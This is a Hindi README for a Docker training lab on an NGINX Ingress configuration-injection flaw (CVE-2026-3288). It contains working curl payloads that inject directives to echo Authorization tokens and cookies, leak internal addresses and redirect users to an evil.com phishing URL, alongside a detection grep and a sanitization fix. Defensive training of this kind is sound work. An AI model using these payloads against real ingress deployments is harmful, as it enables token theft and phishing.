# CVE-2026-3288 NGINX Ingress कॉन्फ़िगरेशन इंजेक्शन के लिए Docker-आधारित असुरक्षित लैब, जिसमें एक्सप्लॉइट स्क्रिप्ट, डिटेक्शन मॉनिटरिंग, और अधिकृत सुरक्षा प्रशिक्षण के लिए रेमेडिएशन मार्गदर्शन शामिल है।
⚠️ चेतावनी: इस प्रयोगशाला में जानबूझकर भेद्य कॉन्फ़िगरेशन शामिल हैं, जो केवल अधिकृत सुरक्षा प्रशिक्षण के लिए हैं
CVE-2026-3288 (CVSS 8.8 उच्च) - NGINX Ingress Controller में कॉन्फ़िगरेशन इंजेक्शन
") इंजेक्शनbuildProxyPass() फ़ंक्शन nginx कॉन्फ़िगरेशन में इंटरपोलेट करने से पहले पथ इनपुट को सैनिटाइज़ नहीं करता है, जिससे हमलावर कोटेड स्ट्रिंग्स से बाहर निकलकर मनमाने nginx निर्देश इंजेक्ट कर सकते हैं।
CVE-2026-3288-lab/
├── README.md # यह फ़ाइल
├── docker-compose.yml # मुख्य प्रयोगशाला सेटअप
├── docker/
│ ├── nginx/
│ │ ├── Dockerfile # भेद्य NGINX सेटअप
│ │ ├── nginx.conf # आधार कॉन्फ़िगरेशन
│ │ └── vulnerable-config.conf # भेद्य पथ हैंडलिंग
│ └── backend/
│ ├── Dockerfile # सरल बैकएंड ऐप
│ └── app.py # Flask एप्लिकेशन
├── exploits/
│ ├── exploit.py # स्वचालित शोषण स्क्रिप्ट
│ ├── payloads.txt # शोषण पेलोड का संग्रह
│ └── test-exploits.sh # सभी शोषणों का परीक्षण
├── detection/
│ └── monitor-logs.sh # शोषण प्रयासों की निगरानी
└── cleanup/
└── cleanup.sh # सभी प्रयोगशाला संसाधन हटाएं
cd CVE-2026-3288-lab
# भेद्य वातावरण प्रारंभ करें
docker-compose up -d
# स्थिति जांचें
docker-compose ps
# बैकएंड चल रहा है या नहीं जांचें
curl http://localhost:8080/
# NGINX चल रहा है या नहीं जांचें
curl http://localhost/
cd exploits
# स्वचालित शोषण
python3 exploit.py --all
# या व्यक्तिगत शोषणों का परीक्षण करें
bash test-exploits.sh
# शोषण के लिए NGINX लॉग देखें
docker-compose logs -f nginx
# डिटेक्शन की निगरानी करें
cd detection
bash monitor-logs.sh
docker-compose down -v
हमलावर-नियंत्रित सामग्री परोसने के लिए nginx return निर्देश इंजेक्ट करें।
पेलोड:
/api" return 200 "HACKED BY ATTACKER
परीक्षण:
curl 'http://localhost/api" return 200 "HACKED'
Bearer टोकन चुराने के लिए प्रतिक्रिया में Authorization हेडर वापस प्रतिबिंबित करें।
पेलोड:
/login" return 200 "Token: $http_authorization
परीक्षण:
curl -H "Authorization: Bearer secret123" 'http://localhost/login" return 200 "Token: $http_authorization'
उपयोगकर्ताओं को हमलावर-नियंत्रित फ़िशिंग साइट पर रीडायरेक्ट करें।
पेलोड:
/" return 302 "https://evil.com/phishing
परीक्षण:
curl -I 'http://localhost/" return 302 "https://evil.com/phishing'
आंतरिक सर्वर जानकारी लीक करें।
पेलोड:
/" return 200 "Internal IP: $server_addr
परीक्षण:
curl 'http://localhost/" return 200 "Internal IP: $server_addr'
सत्र कुकीज़ चुराएं।
पेलोड:
/" return 200 "Cookies: $http_cookie
परीक्षण:
curl -H "Cookie: session=abc123" 'http://localhost/" return 200 "Cookies: $http_cookie'
# भेद्य कॉन्फ़िगरेशन
location ~ "^/api" {
rewrite "(?i)/api" /backend break;
proxy_pass http://backend;
}
जब पथ में " होता है, यह कोटेड स्ट्रिंग को तोड़ देता है:
# हमलावर इनपुट: /api" return 200 "HACKED
# परिणाम:
location ~ "^/api" return 200 "HACKED" {
# मूल कॉन्फ़िगरेशन अब टूट गया है
}
# संदिग्ध पैटर्न देखें
docker-compose logs nginx | grep -E '(return|rewrite|set).*"'
# इंजेक्टेड निर्देशों के लिए NGINX कॉन्फ़िगरेशन जांचें
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf | grep -A5 "location"
" और \ को उचित रूप से एस्केप करें// पहले (भेद्य)
path := location.Path
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)
// बाद में (ठीक किया गया)
path := sanitizeQuotedRegex(location.Path)
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)
इस प्रयोगशाला को पूरा करने के बाद, आप समझ जाएंगे:
# लॉग जांचें
docker-compose logs
# पुनः प्रारंभ करें
docker-compose restart
# docker-compose.yml में पोर्ट बदलें
# या विरोधी सेवाओं को रोकें
sudo lsof -i :80
# सत्यापित करें कि NGINX चल रहा है
docker-compose ps nginx
# NGINX कॉन्फ़िगरेशन जांचें
docker exec cve-2026-3288-nginx nginx -t
केवल अधिकृत सुरक्षा प्रशिक्षण और अनुसंधान उद्देश्यों के लिए बनाया गया